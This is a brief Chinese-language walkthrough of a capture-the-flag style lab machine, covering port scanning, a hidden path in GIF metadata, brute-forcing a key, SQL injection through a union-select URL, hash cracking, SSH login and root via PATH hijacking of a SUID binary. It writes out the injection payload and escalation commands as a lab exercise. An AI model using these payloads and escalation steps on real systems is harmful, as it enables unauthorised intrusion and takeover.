nmap 扫描端口
访问首页有个 gif 图片,下载下来用 exiftool 看一下会发现有个 comment
访问一下 kzMb5nVYJw,要输 key,尝试用 burp 选了个 password 的字典爆破一下:elite
访问之后发现:
输入 " 报错
然后...
一年没有手工注入了,还有点怀念
http://192.168.149.195/kzMb5nVYJw/420search.php?usrtosearch="union select 1,2,3#
你以为我接下来要手注?不,我已经忘了那些单词咋拼了Orz...
先 base64 解码一遍,然后 md5 解出来是 omega
扫目录发现
去访问一下 phpmyadmin,试了几个密码登不上
然后对着 777 端口去连接 ssh,连上了
find 找一下带有 S 权限的
find / -user root -perm -4000 -print 2>/dev/null
把那个 /var/www/backup/procwatch 给拷贝下来
echo '/bin/sh' > ps
chmod x ps
PATH=/var/www/backup
./procwatch
然后就拿到了 root 权限,但是因为环境变量改了,所以没法直接用 ls,可以 /bin/ls
